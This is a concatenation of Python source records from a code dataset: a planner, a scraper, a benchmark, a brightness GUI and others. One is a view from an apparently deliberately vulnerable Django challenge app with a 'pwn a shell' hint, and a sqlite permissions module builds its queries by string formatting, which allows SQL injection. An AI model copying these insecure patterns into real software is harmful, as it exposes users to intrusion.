redirect(url_for('index'))\n","sub_path":"app/tickets.py","file_name":"tickets.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"100348514","text":"from machine.machine import load_machine\nfrom planning.planner import plan\nfrom planning.task import Task as PlanningTask\n\nfrom machine.state \\\n\timport State as MachineState, \\\n\t\t\tStateTolerance as MachineStateTolerance\n\t\t\t\nimport math\nimport os\n\n\n\n\n\n\n\nplanning_task = PlanningTask()\n\n\n# Create the platform object\nscript_file_name = os.path.abspath(__file__)\ndirectory_name = os.path.dirname(script_file_name)\n\ntry:\n\tmachine_config_file = open(directory_name + \"/machine.conf\", \"r\")\n\tplanning_task.machine = load_machine(machine_config_file)\n\tmachine_config_file.close()\nexcept:\n\traise Exception() #!!!!! 
Generate proper exceptions\n\t\n\t\nplanning_task.initial_machine_state = MachineState([0.0, 0.0, 0.0])\nplanning_task.target_machine_state = MachineState([0.0, 0.3, 0.0])\nplanning_task.target_machine_state_tolerance = \\\n\tMachineStateTolerance(\n\t\t[0.1, 0.1, 0.25 * math.pi]\n\t\t# [0.05, 0.05, 0.0625 * math.pi]\n\t)\n\t\n\t\nmachine_controls_sequence = plan(planning_task)\n\nif machine_controls_sequence is not None:\n\tfor machine_control in machine_controls_sequence:\n\t\tprint(\"%s %s %s\" % (machine_control.velocity, machine_control.angle, machine_control.duration))\nelse:\n\tprint(\"No path\")\n\t","sub_path":"plan.py","file_name":"plan.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"431548726","text":"import unreal_engine as ue\r\nfrom time import sleep\r\nimport json\r\nfrom pathlib import Path\r\nimport time\r\n\r\nclass VTOL_BP:\r\n\tdef begin_play(self):\r\n\t\tFilePath = Path(__file__).parents[2]\r\n\t\ttimestr = time.strftime(\"%Y.%m.%d-%H.%M.%S\")\r\n\t\tFileName = \"LogFiles\\Log-\" + timestr + \".txt\"\r\n\t\tglobal FullFile\r\n\t\tFullFile = Path(FilePath, FileName)\r\n\t\t#print(FullFile)\r\n\t\t#global File \r\n\t\t#File = open(FullFile, \"w+\")\r\n\r\n\tdef SaveText(self, text):\r\n\t\tStringText = text.replace('\\\\n', '\\n')\r\n\t\t#StringText = str(text)\r\n\t\tFile = open(FullFile, \"a\")\r\n\t\tFile.write(StringText)\r\n\t\tFile.write('\\n')\r\n\t\tFile.close()\r\n","sub_path":"DroneScheduler/Content/Scripts/VTOLScript.py","file_name":"VTOLScript.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"61619153","text":"import json\nimport logging\nfrom decimal import Decimal\n\nfrom bs4 import BeautifulSoup\n\nfrom storescraper.categories import HEADPHONES, MONITOR, MOUSE\nfrom storescraper.product import Product\nfrom storescraper.store import Store\nfrom storescraper.utils import remove_words, session_with_proxy\n\n\nclass LapShop(Store):\n @classmethod\n def categories(cls):\n return [\n MONITOR,\n HEADPHONES,\n MOUSE,\n ]\n\n @classmethod\n def discover_urls_for_category(cls, category, extra_args=None):\n url_extensions = [\n ['monitores-gamer', MONITOR],\n ['monitores-business', MONITOR],\n ['audio', HEADPHONES],\n ['teclados-y-mouse', MOUSE],\n ]\n\n session = session_with_proxy(extra_args)\n product_urls = []\n for url_extension, local_category in url_extensions:\n if local_category != category:\n continue\n page = 1\n while True:\n if page > 10:\n raise Exception('page overflow')\n url_webpage = 'https://www.lapshop.cl/collections/{}?' 
\\\n 'page={}'.format(url_extension, page)\n print(url_webpage)\n data = session.get(url_webpage).text\n soup = BeautifulSoup(data, 'html.parser')\n product_container = soup.find('ul', 'productgrid--items')\n if not product_container:\n if page == 1:\n logging.warning('Empty category: ' + url_extension)\n break\n for container in product_container.findAll(\n 'a', 'productitem--image-link'):\n product_url = container['href']\n product_urls.append('https://www.lapshop.cl' + product_url)\n page += 1\n return product_urls\n\n @classmethod\n def products_for_url(cls, url, category=None, extra_args=None):\n print(url)\n session = session_with_proxy(extra_args)\n response = session.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n json_info = json.loads(\n soup.find('script', {'data-section-type': 'static-product'}).text\n )['product']\n name = json_info['title']\n sku = str(json_info['id'])\n stock = -1 if json_info['available'] else 0\n normal_price = Decimal(json_info['price'] // 100)\n prices = soup.find('div', 'product-block--price')\n offer_price = Decimal(remove_words(\n prices.find('span', 'money').text))\n picture_urls = ['https:' + image_url.split('?')[0] for image_url in\n json_info['images']]\n\n if 'SEGUNDA' in name.upper():\n condition = 'https://schema.org/RefurbishedCondition'\n else:\n condition = 'https://schema.org/NewCondition'\n\n p = Product(\n name,\n cls.__name__,\n category,\n url,\n url,\n sku,\n stock,\n normal_price,\n offer_price,\n 'CLP',\n sku=sku,\n picture_urls=picture_urls,\n condition=condition\n )\n return [p]\n","sub_path":"storescraper/stores/lap_shop.py","file_name":"lap_shop.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"639044129","text":"# -*- coding: utf-8 -*-\nfrom django.conf import settings\nfrom django.test import TestCase\nfrom pigi1300.actions import get_signature\nfrom pigi1300.constants import SD\nfrom pigi1300.models import ClassifiedDocument, Copy, DestructionPV\n\n__author__ = 'Matthieu Gallet'\n\n\nclass TestDestructionPV(TestCase):\n def test_2d(self):\n doc_1 = ClassifiedDocument(record_number='record-1', classification=SD)\n doc_1.save()\n code_1d = '%s%05d%07d' % (Copy.PREFIX_1D, settings.EAN13_IDENTIFIER, 1)\n copy_1 = Copy(document=doc_1, copy_identifier=1, reproduction_identifier=None, self_issued=True,\n signature=get_signature(doc_1.record_number), code_1d=code_1d)\n copy_1.save()\n record_number = 'pv-1'\n obj_1 = DestructionPV(record_number=record_number, signature=get_signature(record_number), code_1d=code_1d)\n obj_1.save()\n obj_1.copies.add(copy_1)\n self.assertEqual(obj_1.to_2d(), 'pv-1:pv-1:1000010000001:record-1;SD;1;-')\n result = obj_1.to_2d()\n result += ':record-2;SD;2;-'\n obj_2 = DestructionPV.from_2d(result)\n self.assertEqual(obj_2.record_number, record_number)\n self.assertEqual(2, obj_2.copies.all().count())\n self.assertEqual(1, ClassifiedDocument.objects.filter(record_number='record-2', classification=SD).count())","sub_path":"pigi1300/tests/test_destructionpv.py","file_name":"test_destructionpv.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"575226877","text":"from django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom forms import MessageForm\nfrom models import Messages\n\nimport 
md5\n\n\n@csrf_exempt\ndef message(request):\n if request.method == 'POST':\n form = MessageForm(request.POST)\n if form.is_valid():\n name = form.cleaned_data['name']\n content = form.cleaned_data['content']\n ip = request.META['REMOTE_ADDR']\n\n sess = request.session\n if not sess.has_key( 'name' ) or sess['name'] != name:\n sess['name'] = name\n\n if name.lower() == 'orange':\n name = 'Wrong way'\n content = 'Try to pwn a shell instead of cracking md5.'\n elif md5.new(name).hexdigest() == 'e5bc16fcbca0f279df17b66d8c37e109':\n name = 'Orange'\n\n Messages( name=name,\n content=content, \n ip=ip ).save()\n return HttpResponseRedirect( '/' )\n else:\n sess = request.session.load()\n if sess.has_key( 'name' ):\n default = sess['name']\n else:\n default = 'Guest'\n\n form = MessageForm( initial={'name': default} )\n\n messages = Messages.objects.order_by('id').reverse()[:100]\n response = render_to_response( 'message.html',\n {'form': form, 'messages': messages} )\n return response","sub_path":"vulnerableDjango/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"435561584","text":"import sqlite3\nimport os\n\ninitialized = False\nconn = None\nc = None\nc_dict = None\n\n\nGROUPS_DB = \"\"\"\n CREATE TABLE IF NOT EXISTS groups\n (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n name text UNIQUE\n );\n\"\"\"\n\nPERMISSIONS_DB = \"\"\"\n CREATE TABLE IF NOT EXISTS `permissions` (\n `id`\tINTEGER PRIMARY KEY AUTOINCREMENT,\n `action`\tTEXT,\n `name`\ttext,\n `notes`\tTEXT\n );\n\"\"\"\n\nGROUP_PERMISSIONS_DB = \"\"\"\n CREATE TABLE IF NOT EXISTS group_permissions\n (\n group_id integer NOT NULL,\n permission integer NOT NULL,\n FOREIGN KEY (group_id) REFERENCES groups(id),\n FOREIGN KEY (permission) REFERENCES permissions(id)\n );\n\"\"\"\n\n\ndef init(path=\"/\", database=\"permissions.db\"):\n global conn\n global c\n global initialized\n global c_dict\n\n conn = sqlite3.connect(os.path.join(path, database))\n c = conn.cursor()\n conn.row_factory = dict_factory\n c_dict = conn.cursor()\n\n c.execute(GROUPS_DB)\n c.execute(PERMISSIONS_DB)\n c.execute(GROUP_PERMISSIONS_DB)\n\n conn.commit()\n\n initialized = True\n\n\ndef can_group_access(group, action):\n init_check()\n group = get_group_id(group)\n action = get_permission_id(action)\n statement = \"SELECT COUNT(*) > 0 FROM group_permissions WHERE group_id='{}' AND permission='{}'\".format(group, action)\n c.execute(statement)\n val = c.fetchone()[0]\n return int(val) == 1\n\n\ndef grant_group_permission(group, action):\n init_check()\n group = get_group_id(group)\n action = get_permission_id(action)\n if can_group_access(group, action) is False:\n statement = \"INSERT INTO group_permissions VALUES ('{}', '{}')\".format(group, action)\n c.execute(statement)\n conn.commit()\n\n\ndef revoke_group_permission(group, action):\n init_check()\n group = get_group_id(group)\n action = get_permission_id(action)\n statement = \"DELETE FROM group_permissions WHERE group_id='{}' AND permission='{}'\".format(group, action)\n c.execute(statement)\n conn.commit()\n\n\ndef add_group(name):\n init_check()\n statement = \"INSERT INTO groups (name) VALUES ('{}')\".format(name)\n try:\n c.execute(statement)\n except sqlite3.IntegrityError:\n raise ValueError(\"The Group Which You Have Attempted To Create, Already Exists!\")\n conn.commit()\n return c.lastrowid\n\n\ndef add_permission(name):\n init_check()\n statement = \"INSERT INTO permissions 
(name) VALUES ('{}')\".format(name)\n c.execute(statement)\n conn.commit()\n\n\ndef get_permission_states(group):\n init_check()\n group = get_group_id(group)\n\n # HUGE query I made myself, and am very proud of :) - Go Me!\n statement = \"select *, id in (select id from group_permissions where permissions.id=group_permissions.permission and group_permissions.group_id='{}') as access from permissions\".format(group)\n c_dict.execute(statement)\n return c_dict.fetchall()\n\n\ndef get_group_info(group):\n init_check()\n group = get_group_id(group)\n statement = \"SELECT * FROM groups WHERE id='{}'\".format(group)\n c_dict.execute(statement)\n return c_dict.fetchone()\n\n\ndef revoke_all_permissions(group):\n statement = \"DELETE FROM group_permissions WHERE group_id='{}'\".format(group)\n c.execute(statement)\n conn.commit()\n\n\ndef get_all_groups():\n init_check()\n statement = \"SELECT * FROM groups\"\n c_dict.execute(statement)\n return c_dict.fetchall()\n\n\ndef get_group_name(group_id):\n statement = \"SELECT name FROM groups WHERE id='{}'\".format(group_id)\n c.execute(statement)\n return c.fetchone()[0]\n\n\n# region Dependencies\n# region Name To ID Converters\ndef get_group_id(name):\n init_check()\n if str(name).isdigit():\n return int(name)\n\n statement = \"SELECT id FROM groups WHERE name='{}'\".format(name)\n c.execute(statement)\n return c.fetchone()[0]\n\n\ndef get_permission_id(name):\n init_check()\n if str(name).isdigit():\n return int(name)\n statement = \"SELECT id FROM permissions WHERE name='{}'\".format(name)\n c.execute(statement)\n return c.fetchone()[0]\n# endregion\n\n\ndef init_check():\n if initialized is False:\n raise SystemError(\"Please Initialize Before Running (Call The 'init' Function)\")\n\n\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n# endregion\n\n","sub_path":"permissions/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"402206464","text":"import dbm\nimport json\nimport os\nimport os.path\nfrom collections import defaultdict\nfrom contextlib import redirect_stdout, suppress\nfrom random import randrange\n\nimport pysos\nfrom genutility.iter import batch\nfrom genutility.time import MeasureTime\nfrom pytablewriter import MarkdownTableWriter\nfrom sqlitedict import SqliteDict\n\nfrom lmdbm import Lmdb, __version__\nfrom lmdbm.lmdbm import remove_lmdbm\n\n\nclass JsonLmdb(Lmdb):\n\tdef _pre_value(self, value):\n\t\treturn json.dumps(value).encode(\"utf-8\")\n\tdef _post_value(self, value):\n\t\treturn json.loads(value.decode(\"utf-8\"))\n\ndef data(size):\n\tfor i in range(size):\n\t\tyield \"key_\" + str(i), {\"some\": \"object_\" + str(i)}\n\ndef randkeys(num, size):\n\tfor i in range(num):\n\t\tyield \"key_\" + str(randrange(0, size)) # nosec\n\ndef allkeys(num):\n\tfor i in range(num):\n\t\tyield \"key_\" + str(i)\n\ndef remove_dbm(path):\n\twith suppress(FileNotFoundError):\n\t\tos.unlink(path + \".dat\")\n\twith suppress(FileNotFoundError):\n\t\tos.unlink(path + \".bak\")\n\twith suppress(FileNotFoundError):\n\t\tos.unlink(path + \".dir\")\n\ndef run_bench(N, db_tpl):\n\n\tbatchsize = 1000\n\tLMDBM_FILE = db_tpl.format(\"lmdbm\")\n\tPYSOS_FILE = db_tpl.format(\"pysos\")\n\tSQLITEDICT_FILE = db_tpl.format(\"sqlitedict\")\n\tDBM_FILE = db_tpl.format(\"dbm\")\n\n\tremove_lmdbm(LMDBM_FILE)\n\twith 
suppress(FileNotFoundError):\n\t\tos.unlink(PYSOS_FILE)\n\twith suppress(FileNotFoundError):\n\t\tos.unlink(SQLITEDICT_FILE)\n\tremove_dbm(DBM_FILE)\n\tret = defaultdict(dict)\n\n\t# writes\n\n\t\"\"\" # without batch\n\twith PrintStatementTime(\"lmdbm (no batch) {} writes: {{delta:.02f}}\".format(N)):\n\t\tdb = JsonLmdb.open(LMDBM_FILE, \"c\")\n\t\tfor k, v in data(N):\n\t\t\tdb[k] = v\n\t\tdb.close()\n\n\tremove_lmdbm(LMDBM_FILE)\n\t\"\"\"\n\n\twith MeasureTime() as t:\n\t\twith JsonLmdb.open(LMDBM_FILE, \"c\") as db:\n\t\t\tfor pairs in batch(data(N), batchsize):\n\t\t\t\tdb.update(pairs)\n\tret[\"lmdbm\"][\"write\"] = t.get()\n\tprint(\"lmdbm batch write\", N, t.get())\n\n\twith open(os.devnull, \"w\") as devnull: # mute annoying \"free lines\" output\n\t\twith redirect_stdout(devnull):\n\t\t\twith MeasureTime() as t:\n\t\t\t\tdb = pysos.Dict(PYSOS_FILE)\n\t\t\t\tfor k, v in data(N):\n\t\t\t\t\tdb[k] = v\n\t\t\t\tdb.close()\n\tret[\"pysos\"][\"write\"] = t.get()\n\tprint(\"pysos write\", N, t.get())\n\n\twith MeasureTime() as t:\n\t\twith SqliteDict(SQLITEDICT_FILE) as db:\n\t\t\tfor pairs in batch(data(N), batchsize):\n\t\t\t\tdb.update(pairs)\n\t\t\t\tdb.commit()\n\tret[\"sqlitedict\"][\"write\"] = t.get()\n\tprint(\"sqlitedict batch write\", N, t.get())\n\n\twith MeasureTime() as t:\n\t\twith dbm.open(DBM_FILE, \"c\") as db:\n\t\t\tfor k, v in data(N):\n\t\t\t\tdb[k] = json.dumps(v)\n\tret[\"dbm\"][\"write\"] = t.get()\n\tprint(\"dbm write\", N, t.get())\n\n\t# reads\n\n\twith MeasureTime() as t:\n\t\twith JsonLmdb.open(LMDBM_FILE, \"r\") as db:\n\t\t\tfor k in allkeys(N):\n\t\t\t\tdb[k]\n\t#ret[\"lmdbm\"][\"read\"] = t.get()\n\tprint(\"lmdbm cont read\", N, t.get())\n\n\twith MeasureTime() as t:\n\t\twith JsonLmdb.open(LMDBM_FILE, \"r\") as db:\n\t\t\tfor k in randkeys(N, N):\n\t\t\t\tdb[k]\n\tret[\"lmdbm\"][\"read\"] = t.get()\n\tprint(\"lmdbm rand read\", N, t.get())\n\n\twith open(os.devnull, \"w\") as devnull: # mute annoying \"free lines\" output\n\t\twith redirect_stdout(devnull):\n\t\t\twith MeasureTime() as t:\n\t\t\t\tdb = pysos.Dict(PYSOS_FILE)\n\t\t\t\tfor k in randkeys(N, N):\n\t\t\t\t\tdb[k]\n\t\t\t\tdb.close()\n\tret[\"pysos\"][\"read\"] = t.get()\n\tprint(\"pysos read\", N, t.get())\n\n\twith MeasureTime() as t:\n\t\twith SqliteDict(SQLITEDICT_FILE) as db:\n\t\t\tfor k in randkeys(N, N):\n\t\t\t\tdb[k]\n\tret[\"sqlitedict\"][\"read\"] = t.get()\n\tprint(\"sqlitedict read\", N, t.get())\n\n\twith MeasureTime() as t:\n\t\twith dbm.open(DBM_FILE, \"r\") as db:\n\t\t\tfor k in randkeys(N, N):\n\t\t\t\tjson.loads(db[k])\n\tret[\"dbm\"][\"read\"] = t.get()\n\tprint(\"dbm read\", N, t.get())\n\n\treturn ret\n\ndef bench(base):\n\n\twith suppress(FileExistsError):\n\t\tos.mkdir(base)\n\n\tret = {}\n\tdb_tpl = os.path.join(base, \"test_{}.db\")\n\n\tfor num in [10, 100, 10**3, 10**4, 10**5, 10**6]:\n\t\tret[num] = run_bench(num, db_tpl)\n\n\treturn ret\n\ndef print_markdown_table(results, method):\n\n\tfor k, v in results.items():\n\t\theaders = list(v.keys())\n\t\tbreak\n\n\tvalue_matrix = []\n\tfor k, v in results.items():\n\t\trow = [k]\n\t\tfor h in headers:\n\t\t\trow.append(v[h][method])\n\t\tvalue_matrix.append(row)\n\n\theaders = [\"items\"] + headers\n\n\twriter = MarkdownTableWriter(table_name=method, headers=headers, value_matrix=value_matrix)\n\twriter.write_table()\n\nif __name__ == \"__main__\":\n\n\tfrom argparse import ArgumentParser\n\tparser = ArgumentParser()\n\tparser.add_argument(\"outpath\", default=\"bench-dbs\", help=\"Directory to store temporary 
benchmarking databases\")\n\tparser.add_argument(\"--version\", action=\"version\", version=__version__)\n\targs = parser.parse_args()\n\n\ta = bench(args.outpath)\n\tprint_markdown_table(a, \"write\")\n\tprint_markdown_table(a, \"read\")\n\tb = bench(args.outpath)\n\tprint_markdown_table(b, \"write\")\n\tprint_markdown_table(b, \"read\")\n","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"345351665","text":"\"\"\"\nThis script creates a new database storing the information\nfound in the 5000 word_frequency list.\n\"\"\"\n\nimport sqlite3\nimport pandas as pd\nimport math\n\n######## Initialize Database ##########\n#file paths\nsqlite_file = 'word_freq_5000_db.sqlite' #name of database file\nword_data = '/home/andy/Projects/O/diff_anal/word_db/5000 word frequency list.csv'\n\n#Construct pandas dataframe \ndf = pd.read_csv(word_data, header=0)\ndf['Word'] = df['Word'].map( lambda x : str(x).strip('\\xc2\\xa0\\xc2\\xa0\\xc2\\xa0') ) #hack to eliminate unicode spaces (I wish I could find a more elegant solution)\ndf['Class'] = df['Rank'].map( lambda x : math.floor(x/100.0) ) #classifies vocabulary based on chunks of 100\n\n#Initialize SQL\nconn = sqlite3.connect(sqlite_file)\nc = conn.cursor()\n\n\n######### Create / Populate Database ###########\n#clear current database\nc.execute('''DROP TABLE WordFreq''')\n\n#initialize table \nc.execute(\n\t'''CREATE TABLE WordFreq (\n\t\t\tID INTEGER PRIMARY KEY, \n\t\t\tRank INTEGER, \n\t\t\tWord TEXT, \n\t\t\tPartofSpeech TEXT, \n\t\t\tFrequency INTEGER, \n\t\t\tDispersion REAL,\n\t\t\tClass INTEGER\n\t\t\t)''' \n\t)\n\n#populate table (convert dataframe to sql database)\ndf.to_sql(name='WordFreq', index=False, flavor='sqlite', con=conn, if_exists='replace')\n\n#commit changes\nconn.commit()\nconn.close()\n","sub_path":"init_word5000_db.py","file_name":"init_word5000_db.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"536227975","text":"#!/usr/bin/python3\nimport sys\nimport os\nimport subprocess\nfrom PySide import QtCore, QtGui\n#from PyQt4 import QtCore, QtGui\nclass Window(QtGui.QMainWindow): \n\tdef __init__(self):\n\t\tsuper(Window,self).__init__()\n\t\t#setting up the position of the GUI with 1st and 2nd parameters\n\t\t#(3rd and 4th parameters are not useful as we have fixed it's max and min size below)\n\t\tself.setGeometry(530,290,280,120)\n\t\tself.setWindowTitle(\"Brightness\")\n\t\t\n\t\tself.setMinimumSize(QtCore.QSize(280, 120))\n\t\tself.setMaximumSize(QtCore.QSize(280, 120))\n\t\t\n\t\t#The slider which we slide\n\t\tself.slide = QtGui.QSlider(self)\n\t\tself.slide.setGeometry(QtCore.QRect(70, 58, 160, 22))\n\t\tself.slide.setOrientation(QtCore.Qt.Horizontal)\n\t\tself.slide.valueChanged.connect(self.slided_def)\n\t\tself.slide.setMaximum(100)\n\t\tself.slide.setMinimum(0)\n\t\t\n\t\t#Just a label to denote what user need to do\n\t\tself.adj = QtGui.QLabel(self)\n\t\tself.adj.setGeometry(50, 5, 471, 20)\n\t\tself.adj.setText(\"Slide the bar to adjust brightness\")\n\t\t\n\t\t#creating and adding increment button\t\n\t\tself.inc = QtGui.QPushButton(\"+\",self)\n\t\tself.inc.setGeometry(QtCore.QRect(237, 60, 17, 17))\n\t\tself.inc.clicked.connect(self.inc_def)\n\n\t\t#creating and adding decrement button\t\n\t\tself.dec = 
QtGui.QPushButton(\"-\",self)\n\t\tself.dec.setGeometry(QtCore.QRect(45, 60, 17, 17))\n\t\tself.dec.clicked.connect(self.dec_def)\n\n\t\t#This label shows the black sun with rays! \n\t\tself.bright = QtGui.QLabel(self)\n\t\tself.bright.setGeometry(20, 60,20, 20)\n\t\tself.bright.setText(u\"\\u2600\")\n \t\n \t#This shows the percentage of brightness\n\t\tself.percentval = QtGui.QLabel(self)\n\t\tself.percentval.setGeometry(35, 35, 471, 20)\n\t\tself.percentval.setText(\"Slide the bar to adjust brightness\")\n\t\t\n\t\t#The set button\n\t\tself.set = QtGui.QPushButton(\"Set\",self)\n\t\tself.set.setGeometry(QtCore.QRect(20, 90, 120, 23))\n\t\tself.set.clicked.connect(self.set_val_def)\n\t\t\n\t\t#the exit button\n\t\tself.exit = QtGui.QPushButton(\"Exit\",self)\n\t\tself.exit.setGeometry(QtCore.QRect(144, 90, 120, 23))\n\t\tself.exit.clicked.connect(self.close_application)\n\t\t\n\t\t#we will use this one later for timer(our countdown is 10 but we use 9 because we waste a second on 10)\n\t\tself.count = 9\n\t\t\n\t\t#if such path exists then we change value in that path else exception propogates\n\t\ttry:\n\t\t\tpath = os.path.join(\"/sys/class/backlight/nv_backlight\", \"brightness\")\n\t\t\twith open(path, \"r\") as inputFile:\n\t\t\t\tself.init = inputFile.read()\n\t\t\t\tself.init1 = int(self.init)\n\t\texcept IOError:\n\t\t\ttry:\n\t\t\t\tpath = os.path.join(\"/sys/class/backlight/radeon_bl0\", \"brightness\")\n\t\t\t\twith open(path, \"r\") as inputFile:\n\t\t\t\t\tself.init1 = int(inputFile.read())/26\n\t\t\texcept IOError:\n\t\t\t\ttry:\n\t\t\t\t\tpath = os.path.join(\"/sys/class/backlight/intel_backlight\", \"brightness\")\n\t\t\t\t\twith open(path, \"r\") as inputFile:\n\t\t\t\t\t\tself.init1 = int(inputFile.read())/75\n\t\t\t\texcept IOError:\n\t\t\t\t\ttry:\n\t\t\t\t\t\ta = float(readx())*100\n\t\t\t\t\t\tself.init1 = int(a)\n\t\t\t\t\texcept IOError:\n\t\t\t\t\t\tchoice = QtGui.QMessageBox.warning(self,'Caution!',\"We are not supporting your display drivers as of now.\\nSorry:(\",QtGui.QMessageBox.Cancel)\n\t\t\t\t\t\tif choice == QtGui.QMessageBox.Cancel:\n\t\t\t\t\t\t\tsys.exit()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tpass\n\n\t\tself.slide.setValue(int(self.init1))\n\t\t\n\t\t#uncomment the below 6 lines if you want :)\n\t\t#self.setGeometry(530,290,160,22)\n\t\t#self.setMinimumSize(QtCore.QSize(280, 150))\n\t\t#self.setMaximumSize(QtCore.QSize(280, 150))\n\t\t#self.india = QtGui.QLabel(self)\n\t\t#self.india.setGeometry(65 , 120, 471, 20)\n\t\t#self.india.setText(\" Made with \"+ u\"\\u2764\"+\" in INDIA\")\n\t\t\n\t\t\n\t\t#check if the user is running as root\n\t\tif not os.geteuid() == 0:\n\t\t\tchoice = QtGui.QMessageBox.warning(self,'Sorry',\"Only root can run this script!\\n\",QtGui.QMessageBox.Close)\n\t\t\tif choice == QtGui.QMessageBox.Close:\n\t\t\t\tsys.exit(1)\n\t\t\telse:\n\t\t\t\tpass\n\t\t\n\t\t\n\t\t\n\t\t#show all the above content in the dialog box\t\n\t\tself.show()\n\n\t\n\t#used with '+' to increment 1 unit\n\tdef inc_def(self):\n\t\ttmp1 = self.slide.value() \n\t\tself.slide.setValue(int(tmp1)+1)\n\t\n\t\n\t#used with '-' to decrement 1 unit\t\n\tdef dec_def(self):\n\t\ttmp1 = self.slide.value() \n\t\tself.slide.setValue(int(tmp1)-1) \n\n\n\t#just close the application\n\tdef close_application(self): \n\t\tsys.exit(1)\n\t\n\t\n\t#changimg value on slider on startup and on setting\t\n\tdef slided_def(self):\n\t\tval = self.slide.value()\n\t\tself.percentval.setText(str(val)+\" %\")\n\t\n\t\n\t#set the brightness\n\tdef set_val_def(self):\n\t\t#get the 
current values before setting the brightness\n\t\ttry:\n\t\t\tpath = os.path.join(\"/sys/class/backlight/nv_backlight\", \"brightness\")\n\t\t\twith open(path, \"r\") as inputFile:\n\t\t\t\tself.prev = inputFile.read()\n\t\texcept IOError:\n\t\t\ttry:\n\t\t\t\tpath = os.path.join(\"/sys/class/backlight/radeon_bl0\", \"brightness\")\n\t\t\t\twith open(path, \"r\") as inputFile:\n\t\t\t\t\tself.prev = int(inputFile.read())/26\n\t\t\texcept IOError:\n\t\t\t\ttry:\n\t\t\t\t\tpath = os.path.join(\"/sys/class/backlight/intel_backlight\", \"brightness\")\n\t\t\t\t\twith open(path, \"r\") as inputFile:\n\t\t\t\t\t\tself.prev = int(inputFile.read())/75\n\t\t\t\texcept IOError:\n\t\t\t\t\ttry:\n\t\t\t\t\t\ta = float(readx())*100\n\t\t\t\t\t\tself.prev = int(a)\n\t\t\t\t\texcept IOError:\n\t\t\t\t\t\tchoice = QtGui.QMessageBox.warning(self,'Caution!',\"We are not supporting your display drivers as of now.\\nSorry :(\",QtGui.QMessageBox.Cancel)\n\t\t\t\t\t\tif choice == QtGui.QMessageBox.Cancel:\n\t\t\t\t\t\t\tsys.exit()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tpass\n \n\t\tval = self.slide.value()\n\t\t\n\t\t\n\t\t#if the setting value is less than 10% then we ask user if they are sure!\n\t\t#if they are sure,as a safety check we will wait for 10 seconds and revert back to previous brightness \n\t\tif val<10:\n\t\t\tchoice = QtGui.QMessageBox.warning(self,'Caution!',\"Are you sure you want to do this?\\nIt might not be visible to you!\",QtGui.QMessageBox.Yes| QtGui.QMessageBox.No)\n\t\t\tif choice == QtGui.QMessageBox.Yes:\n\t\t\t\tself.confirm()\n\t\t\t\tself.revert()\n\t\t\telse:\n\t\t\t\tpass\n\t\telse:\n\t\t\ttry:\n\t\t\t\ttext = str(val)\n\t\t\t\tpath = os.path.join(\"/sys/class/backlight/nv_backlight\", \"brightness\")\n\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\tsave(\"/sys/class/backlight/nv_backlight\",text)\n\t\t\texcept IOError:\n\t\t\t\ttry:\n\t\t\t\t\ttext = str(val*26)\n\t\t\t\t\tpath = os.path.join(\"/sys/class/backlight/radeon_bl0\", \"brightness\")\n\t\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\t\tsave(\"/sys/class/backlight/radeon_bl0\",text)\n\t\t\t\texcept IOError:\n\t\t\t\t\ttry:\n\t\t\t\t\t\ttext = str(val*75)\n\t\t\t\t\t\tpath = os.path.join(\"/sys/class/backlight/intel_backlight\", \"brightness\")\n\t\t\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\t\t\tsave(\"/sys/class/backlight/intel_backlight\",text)\n\t\t\t\t\t\t\n\t\t\t\t\texcept IOError:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\ttext = int(val)\n\t\t\t\t\t\t\twritex(text)\n\t\t\t\t\t\texcept IOError:\n\t\t\t\t\t\t\tsys.exit(1)\n \n \n \t\n\t#we are creating a message box asking them to click 'Cancel' if they want to revert\n\tdef revert(self):\n\t\tself.startCount()\n\t\t#choice1 = QtGui.QMessageBox.warning(self,'Caution!',\"Reverting to previous brightness...\",QtGui.QMessageBox.Cancel)\n\t\tself.msg = QtGui.QMessageBox(self)\n\t\tself.msg.setText(\"Reverting in (10)\")\n\t\tself.msg.setInformativeText(\"Click cancel to stop reverting.\")\n\t\tself.msg.setWindowTitle(\"Reverting..\")\n\t\tself.msg.setIcon(QtGui.QMessageBox.Warning)\n\t\tself.msg.setStandardButtons(QtGui.QMessageBox.Cancel)\n\t\tself.msg.buttonClicked.connect(self.win_cancel) \t\n\t\tself.msg.open()\n\t\n\n\t#if the user clicks on cancel,this will be executed\n\tdef win_cancel(self):\n\t\tself.timer.stop() #stopping the timer\n\t\tself.msg.done(1) #closing the message box\n\t\tself.count = 9 #again setting up count for future 
